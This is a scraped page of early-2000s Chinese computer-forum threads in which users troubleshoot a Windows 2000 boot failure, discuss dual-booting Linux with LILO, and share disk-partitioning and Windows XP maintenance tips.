快速回复 | 主题：NT2000下怎么打开COOKIE选项呀
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2K的安装问题~~~

计算机技术
win2K的安装问题~~~

上一贴 | 下一贴
发表人 主题: win2K的安装问题~~~
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-04 15:05:18 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 收藏该主题供以后查看 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
家里的电脑，原来的Win98想删掉装Win2K，是用win2K安装盘直接删除原来的分区，重新创建新的分区，是Maxtor 30GB的硬盘，分了3个10GB的区，用NTFS格式化C:\，安装Win2K，安装过程很顺利，设置过程也没问题，可是启动时到“Windows 2000 Professional，基于NT技术构建”的启动画面，状态条100%后就跳黑屏，光标都没了！！！热启动不了，只能强行关机。可以进安全模式，但是速度巨慢，而且设备管理器里看设备属性也巨慢，简直像死机一样。我装过N次Win2K了，这是头一回碰到~~~
机器的配置：PIII650E/联想Intel 815E主板/128X3 SDRAM/Maxtor金钻二代30GB/Intel i740显卡/SB 128声卡/联想D-Link DFE-530TX网卡/4D+双飞燕鼠标/LogicTech键盘/ RICOH CD-RW/NEC 1.44MB floppy disk...
帮忙看看吧~~~拆来拆去，装上装下，我都快累死了~~~

[这消息被POPOEVER编辑过(编辑时间2002-01-04 15:05:23)]
[这消息被POPOEVER编辑过(编辑时间2002-01-04 15:06:01)]

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2002-01-04 15:17:30 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
是用光盘装的还是在硬盘上装的，如果是用光盘装的，换张光盘，如果是在硬盘上的，重新拷一遍再装，可能是安装文件坏了，有些东西没装上去。

缘是天定,份在人为.
張無忌

高级用户
积分：263
发帖：147
来自：
注册：2001-04-24
 发表于 2002-01-04 15:21:29 按此观看張無忌的个人资料 按此发邮件给張無忌 访问張無忌的主页 張無忌 的 oicq 是1236541,查看 1236541 的资料 发送悄悄话给張無忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看張無忌的IP
我也遇过一次类似的情况，那是我插上了两根256m的内存，以为这次可以牛比一下了，谁知道安装还不错，就是死活进不了win2k,最后我拔掉了一根内存，终于让我的windows重见天日！

我觉得win2k对硬件要求很严格，你的内存太多，很可能这里有问题。

學生時代
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-04 15:38:47 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
to:嘿嘿，光盘装的，根本不是光盘问题，这张光盘我装了N台机器了~~~
to:無忌，我也想到过的，拆掉一根试过，也不行。另外，我在公司的机子上就用了2根256MB的内存，一点问题也没有~~~

[这消息被POPOEVER编辑过(编辑时间2002-01-04 15:41:34)]

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

阿嘉

高级用户
积分：250
发帖：78
来自：四川
注册：2001-02-26
 发表于 2002-01-05 08:50:30 按此观看阿嘉的个人资料 按此发邮件给阿嘉 访问阿嘉的主页 阿嘉 的 oicq 是45702,查看 45702 的资料 发送悄悄话给阿嘉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿嘉的IP
我看是联想主板的问题，他出的东西没什么好货。呵呵~~~
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-07 12:03:48 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
阿嘉在上个帖子中说
引用:
我看是联想主板的问题，他出的东西没什么好货。呵呵~~~

不可能，我公司里有两台就用815EP，好好的，我自己估计是显卡太老了~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2002-01-07 16:53:20 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP

怪~

检查硬盘有没有坏道~
cmos cpu 二级缓存有没有开~

如果是显卡问题进安全模式和vga模式应该不会有多大影响~~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-08 19:20:54 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
问题解决了，如我所料，Win2000对显卡还是有要求的，我的i740该退休了，换成ATI Radeon就OK了~~~

谢谢大家~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2002-01-08 20:44:12 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
POPOEVER在上个帖子中说
引用:
问题解决了，如我所料，Win2000对显卡还是有要求的，我的i740该退休了，换成ATI Radeon就OK了~~~

谢谢大家~~~

I740通常在WIN2000下没有问题的~

ATI Radeon 用这个卡~奢侈~
偶自己家的还在用SIS6326~

[这消息被yunbin编辑过(编辑时间2002-01-08 20:45:18)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

秋天的小乐

终级用户
积分：806
发帖：456
来自：京西
注册：2000-11-13
 发表于 2002-01-08 23:44:16 按此观看秋天的小乐的个人资料 按此发邮件给秋天的小乐 访问秋天的小乐的主页 秋天的小乐 的 oicq 是7545653,查看 7545653 的资料 发送悄悄话给秋天的小乐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋天的小乐的IP
对显卡要求不高的。你的cmos设的是不是有问题？2000基于nt构建，服务功能强大但对于多媒体功能支持不是很好哟！

老婆被泡，马子被翘，脏款被盗，让汽车撞出人行道。
OICQ-7545653
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-08 23:54:18 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
yunbin在上个帖子中说
引用:
POPOEVER在上个帖子中说
引用:
问题解决了，如我所料，Win2000对显卡还是有要求的，我的i740该退休了，换成ATI Radeon就OK了~~~

谢谢大家~~~

I740通常在WIN2000下没有问题的~

ATI Radeon 用这个卡~奢侈~
偶自己家的还在用SIS6326~

二级缓存一直是开的，事实证明i740不行，当然也有可能是我的i740不行~~~
ATI Radeon也有便宜的，我搞了张UNIKA的616，32MB SDRAM的，才400，呵呵，好歹也算是镭啊~~~
Win2K对多媒体支持不好？此话从何说起？

[这消息被POPOEVER编辑过(编辑时间2002-01-08 23:56:35)]

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 | 主题：win2K的安装问题~~~
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Win2K里的服务

计算机技术
Win2K里的服务

上一贴 | 下一贴
发表人 | 主题: Win2K里的服务
jet 我心飞翔 现任版主 积分：5452 发帖：1681 来自：Xi`an 注册：2000-06-18 | 发表于 2002-01-13 09:05:38 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 收藏该主题供以后查看 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 我想把另一个程序(CS服务器，因为他开启的时候老有一个dos窗口)也启动为服务，该怎么添加 ？ Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2002-01-13 21:27:45 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP service程序需要特别的格式，不是任何可执行文件都可以当作service运行的。 CS服务器不是service程序，因此不行。 老哥我知道的就这么多了。
jet 我心飞翔 现任版主 积分：5452 发帖：1681 来自：Xi`an 注册：2000-06-18 | 发表于 2002-01-13 22:32:55 按此观看jet的个人资料 按此发邮件给jet 访问jet的主页 jet 的 oicq 是952265,查看 952265 的资料 发送悄悄话给jet 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jet的IP 明白了！谢谢！ Add Web To Life Blueidea Web Team. Moderator Of Dreamweaver Forum 长的很有创意，活的很有勇气
上一贴 | 下一贴
快速回复 | 主题：Win2K里的服务
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样在win2000上再装linux同时怎么使用

计算机技术
怎样在win2000上再装linux同时怎么使用

上一贴 | 下一贴
发表人 主题: 怎样在win2000上再装linux同时怎么使用
salylan

初级用户
积分：0
发帖：4
来自：
注册：2001-11-07
 发表于 2001-11-07 13:10:02 按此观看salylan的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给salylan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看salylan的IP
怎样在win2000上再装linux同时怎么使用
apple

初级用户
积分：81
发帖：39
来自：bj
注册：2000-06-21
 发表于 2001-11-07 13:30:43 按此观看apple的个人资料 按此发邮件给apple 发送悄悄话给apple 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看apple的IP
可以分开装，用vmware使win2000上运行linux。
salylan

初级用户
积分：0
发帖：4
来自：
注册：2001-11-07
 发表于 2001-11-07 13:37:50 按此观看salylan的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给salylan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看salylan的IP
能具体点么？
Amicool

超级用户
积分：425
发帖：149
来自：杭州+温州→浙江→中国
注册：2001-05-28
 发表于 2001-11-07 15:21:55 按此观看Amicool的个人资料 按此发邮件给Amicool 访问Amicool的主页 Amicool 的 oicq 是1315704,查看 1315704 的资料 发送悄悄话给Amicool 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Amicool的IP
VMware用起来很慢！不太爽的感觉！
不过相对比较安全！

◇ Javascript，Lotus Develop，Web-Design……
◆ わたし------Http://www.amicool.net

salylan

初级用户
积分：0
发帖：4
来自：
注册：2001-11-07
 发表于 2001-11-07 15:40:57 按此观看salylan的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给salylan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看salylan的IP
需要重新分个特别的区么，还是直接装，能说明白点么：（
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-07 16:05:28 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
先装win2000,再装linux,然后用linux的lilo可以引导双操作系统。

不过要注意的一点是有些linux在安装lilo的时候把fat32分区的第一个盘作为windows的引导盘（比如我的机子，c盘装2000,用的是ntfs格式，其他的盘用的是fat32格式，按理说windows的引导盘是hda1,但装lilo的时候linux就把hda4作为引导盘了，结果造成win2000进不去了）。解决的办法很简单，在linux里用随便一个文本编辑器，打开lilo的配置文件，把hda4改成hda1就行了。

还有一个要注意的就是在安装linux的时候一定要启动盘，这样即使以后你重装了2000，也可以再进linux，只要先用启动盘启动，然后运行一遍lilo就行了。

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-07 16:07:41 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
salylan在上个帖子中说
引用:
需要重新分个特别的区么，还是直接装，能说明白点么：（

重新分区是必要的，因为linux有自己的文件格式,只有在这种文件格式下linux才可以发挥得更好。

你可以用pqmagic分区大师来分区，很方便的。

Blueidea Web Team.
Moderator Of Computer Technology Forum
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-07 16:57:52 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
好像有这个专门的软件吧~你去焉老虎看看,绝对有的!

^^
salylan

初级用户
积分：0
发帖：4
来自：
注册：2001-11-07
 发表于 2001-11-08 14:55:26 按此观看salylan的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给salylan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看salylan的IP
十分感谢啸，说的好详细，我再自己试试，有了问题，还要请多多指教。^_*
salylan

初级用户
积分：0
发帖：4
来自：
注册：2001-11-07
 发表于 2001-11-08 15:03:32 按此观看salylan的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给salylan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看salylan的IP
我的c盘是主分区，ntfs格式的，其他的D,E,F都是扩展的逻辑分区FAT32格式，可以直接装linux么，还不太清楚，呵呵？
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-08 16:49:41 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
一般的linux不行，需要先空出一块空间，用PQ减小F盘的空间吧。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-20 12:51:14 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
salylan在上个帖子中说
引用:
我的c盘是主分区，ntfs格式的，其他的D,E,F都是扩展的逻辑分区FAT32格式，可以直接装linux么，还不太清楚，呵呵？

不行，你需要有至少两个ext2格式的分区，可以考虑用pqmagic把F盘转化（前提是F盘够大，象装redhat7.0的，最好能保证有1.2G以上的空间。转化前切记先把原来的文件移到其他的盘上 [image] ）。然后把转化出来的空间分成两个区，这许多安装的说明书上都有，我就不想罗嗦了，不过主分区（/）最好能大一些（1G以上吧），否则到时空间不够系统是不会往下装的，（redhat不会，不过一些老的国产版本会，象以前联想的，弄得我哭笑不得）。而交换区130M就够了，再大了是浪费。
象你所说的C盘是ntfs格式的，就很可能出现我说的装好以后进不了2000的情况，记得改lilo文件哟

Blueidea Web Team.
Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：怎样在win2000上再装linux同时怎么使用
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


做一个好的windows管家

计算机技术
做一个好的windows管家

上一贴 | 下一贴
发表人 主题: 做一个好的windows管家
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-01-15 08:14:01 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
做一个好的windows管家！跟我来吧！
拥有自己的电脑已经有半年了，回想自己的电脑学习之路！觉得有点自己的一点点特色，在这里写给大家，一同来分享吧！
如果刚买了电脑，就要先把硬盘的区分好，因为现在的硬盘越来越大了，管理好硬盘就一定要把区分好！
－－一般的要分二个以上的区，这样比较容易管理硬盘上的资料，要是硬盘大的话，要分四到六到区也不算多，像我的计算机，虽然只有10.2G，但我还是分了五个区，第一个装windows98,D盘装windows2000,E盘是下载的软件和电脑的驱动程序，F盘是存放我的mp3与做的网页与资料，还有我同学的一些资料、G盘是一些稍微乱的东西了！常用的稍大一点的软件，像flash,office,放到E、F盘上。还要注意不要使某个分区利用率大于80％，除了空间不够了！好处：这样即使把C、D盘都格了，也不会把自己的资料丢失！

关于应用软件的问题！
－－－一般一种功能的软件只要装一种就行了。当然要选最适合自己的，像常用的下载工具，虽然大小都不大，但也不要装多个！否则会影响机子的运行速度！

管理好自己的软件！
－－－要是与注册表无关的软件，就最好不要放到系统盘上！否则重装系统后还要重新安装！对于这类软件，最好都为它们创建一个快捷方式，把这些快捷方式放到一个文件夹里，把它们放到开始菜单里，如果想更方便的话，可以为它们建一个快捷键！点击快捷方式的属性，里面有一页快捷键，要用三键（ctrl+alt+?）.那个问号最好要软件的地一个字母！像oicq，就用ctrl+alt+o .有很多开始菜单里 的快捷方式，像acdsee.winzip...都可以把它删除，桌面上也不要太多的快捷方式，只需要几个常用的就行了！

关于重装操作系统！
－－－电脑运行的时间久了，一定会变的慢了，这时你就有必要重新安装系统了。现在有不少软件(像ghost..)可以复制整个系统！利用它们重装系统会很省时间的！不过克隆时要注意，最好是刚装完的新系统，如果有大型的、与改动注册表的软件最好装好后再克隆。（像office.）还有一点：放克隆的文件的区，最好不要进行整理！否则有可能，不能恢复！
以上是海娃的一点点的小小经验吧，以上只是九牛一毛...还请多多指导教!

－－－－
以前写的
－－－－

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-03-01 11:16:45 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
推上来让大家看看。

相信大家也会有自己的体会和经验，不妨也谈谈。

对于软件，除了象51windows说的，我还有一个体会，就是安装多操作系统，不同用途的软件装在不同的系统中。比如我的机子装了3个windows：98/xp/2000.xp是平常使用的，装一些平常的软件；2000是用来调试网站后台的，装了IIS,sql server等；98是用来应急的,装了硬盘分区魔术师之类的。

Blueidea Web Team.
Moderator Of Computer Technology Forum
xiaoxiao2001

超级用户
积分：402
发帖：186
来自：
注册：2001-09-20
 发表于 2002-03-01 11:36:02 按此观看xiaoxiao2001的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给xiaoxiao2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xiaoxiao2001的IP
看了上面的说法，我有点想法．就是我不明白，非要多个系统共存吗？用２０００不好吗？当然，有些老软件还是用的上９８的．

    我给现在的大硬盘是这样分的，选择操作系统Ｗｉｎ２０００，把Ｃ盘划大点，全部装在Ｃ盘，备份注册表，Ｇｈｏｓｔ一下！如果用９８，可以在装２０００前试先装一下，９８和２０００在Ｃ：Ｄ：盘下！建议再分一个Ｅ：区就够了，装ＭＰ３，影视，等，建好目录，Ｇｈｏｓｔ也在Ｅ，我是这样想的，不知道大家怎么看？

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-03-01 11:51:03 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
当然可以只用一个操作系统，只是个人的爱好不同罢了.
原来我也是只用xp,什么软件都装在上面，但后来发现其实有很多软件只有在做某些特定的事情时才用到，放在那影响启动的速度，所以才选择了多个操作系统来完成不同的任务。

Blueidea Web Team.
Moderator Of Computer Technology Forum
xiaoxiao2001

超级用户
积分：402
发帖：186
来自：
注册：2001-09-20
 发表于 2002-03-01 11:53:50 按此观看xiaoxiao2001的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给xiaoxiao2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xiaoxiao2001的IP
因人而定，呵呵 ;) ;) ;)
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-03-01 21:21:24 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
正打算写一些的，诸如论坛安装调试，代理设置以及局域网，还有电脑音乐制作方面的一些个人体会和经验，慢慢整理一下，贴上来，希望有人看哪！
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-03-03 22:26:47 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
几天没来，版主帮我置顶了！谢谢。

这几天刚买了一个40G的硬盘，分了9个区，后面两个区装两个windows2000，一个英文的，一个中文的。以后再装服务器版。。

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

mch

口吃
积分：1848
发帖：862
来自：Shanghai
注册：2001-04-02
 发表于 2002-03-04 20:51:24 按此观看mch的个人资料 按此发邮件给mch 访问mch的主页 mch 的 oicq 是25733502,查看 25733502 的资料 发送悄悄话给mch 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mch的IP
我对系统做了些设置，把程序运行时产生的临时文件（如IE等）集中都放在一个区里，使装操作系统的分区尽量少的产生磁盘碎片，能较长时间保持电脑高效运行，磁盘碎片整理时间也缩短了，系统也用不着经常重装。

原谅他人过失，便是自己荣耀

Blueidea Web Team
Team Symbol

上一贴 | 下一贴
快速回复 | 主题：做一个好的windows管家
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一个行之有效的防止winXP任务栏假死的方法

计算机技术
一个行之有效的防止winXP任务栏假死的方法

上一贴 | 下一贴
发表人 | 主题: 一个行之有效的防止winXP任务栏假死的方法
tntst 高级用户 积分：233 发帖：184 来自：广州 注册：2000-07-23 | 发表于 2002-01-12 09:51:16 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 收藏该主题供以后查看 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP 至少目前觉得这个是最好用的,因为有图片，就懒得贴了，感兴趣的直接到下面的网址看吧： http://www.pconline.com.cn/pcedu/soft/st/winxp/10112/25134_6.html ***>> TNTST <<*** ----------------------------------- 投稿信箱：tntst@pconline.com.cn 网址： http://www.pconline.com.cn/pcedu MM MX：[url]http://www.pconline.com.cn/pcedu/redian/mx/[
arrive 终级用户 积分：1231 发帖：410 来自：大连 注册：2000-12-02 | 发表于 2002-01-12 11:30:50 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP 这样是省了许多空间! Нельзя выпустить из руквозможностъ,которая случается в жизнь.
上一贴 | 下一贴
快速回复 | 主题：一个行之有效的防止winXP任务栏假死的方法
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的天 xp 简直就是硬盘杀手

计算机技术
我的天 xp 简直就是硬盘杀手

上一贴 | 下一贴
发表人 | 主题: 我的天 xp 简直就是硬盘杀手
wangq 硅基帝国中尉 积分：1694 发帖：997 来自：硅基帝国 注册：2000-11-18 | 发表于 2002-01-12 09:00:58 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 收藏该主题供以后查看 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP c 盘4G 空间 刚装完xp就用掉2G 才用一个星期现在c盘只有 200Mb 只装了常用几个小软件在c盘阿 太恐怖了。。。。。。。 http://wangq.myrice.com #@%$#^@%&^#% 爱巢.鸟蛋
tntst 高级用户 积分：233 发帖：184 来自：广州 注册：2000-07-23 | 发表于 2002-01-12 09:39:43 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP 当有软件非法关闭时，XP常常会产生一些临时文件或者是一些记录性的文件，会造成相当大的空间浪费。 另外，安装软件时，有时解压程序没做好，也会在临时文件夹里放了不少东西。 清理一下时时文件夹，也可以参考下面的几篇文章来优化XP。可以省出不少空间，提高速度： http://www.pconline.com.cn/pcedu/soft/st/winxp/10112/25134.html http://www.pconline.com.cn/pcedu/soft/st/winxp/10112/21981.html http://www.pconline.com.cn/pcedu/soft/st/winxp/10201/28291.html ***>> TNTST <<*** ----------------------------------- 投稿信箱：tntst@pconline.com.cn 网址： http://www.pconline.com.cn/pcedu MM MX：[url]http://www.pconline.com.cn/pcedu/redian/mx/[
wangq 硅基帝国中尉 积分：1694 发帖：997 来自：硅基帝国 注册：2000-11-18 | 发表于 2002-01-12 12:00:55 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP thanks 这几篇文章都试过了 不大管用 不知道是不是xp的系统备份功能占掉我那么多空间 哎。。。 太失望了 http://wangq.myrice.com #@%$#^@%&^#% 爱巢.鸟蛋
